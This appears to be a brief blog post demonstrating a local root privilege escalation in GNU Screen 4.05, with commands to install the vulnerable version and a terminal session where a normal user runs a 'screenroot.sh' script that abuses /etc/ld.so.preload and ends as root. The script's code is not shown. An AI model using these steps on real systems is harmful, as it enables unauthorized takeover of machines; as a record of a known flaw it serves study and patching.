screen root privillege escalation

NOTE:
-this exploit will make normal user become root
-tried working with Ubuntu 13.x with old patches but not with Debian 8 or Parrot with latest patches

If you don’t have screen 4.05 then you need to install or compile yourself
# apt-get install screen
or
# cd /root
# cd screen-4.5.0
# apt-get install libncurses5-dev
# ./configure;make;make install

# screen -v
Screen version 4.05.00 (GNU) 10-Dec-16

# su – user1
$ ./screenroot.sh
~ gnu/screenroot ~
[+] First, we create our shell and library…
[+] Now we create our /etc/ld.so.preload file…
[+] Triggering…
‘ from /etc/ld.so.preload cannot be preloaded: ignored.
[+] done!
No Sockets found in /tmp/screens/S-user1.

# whoami
root
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s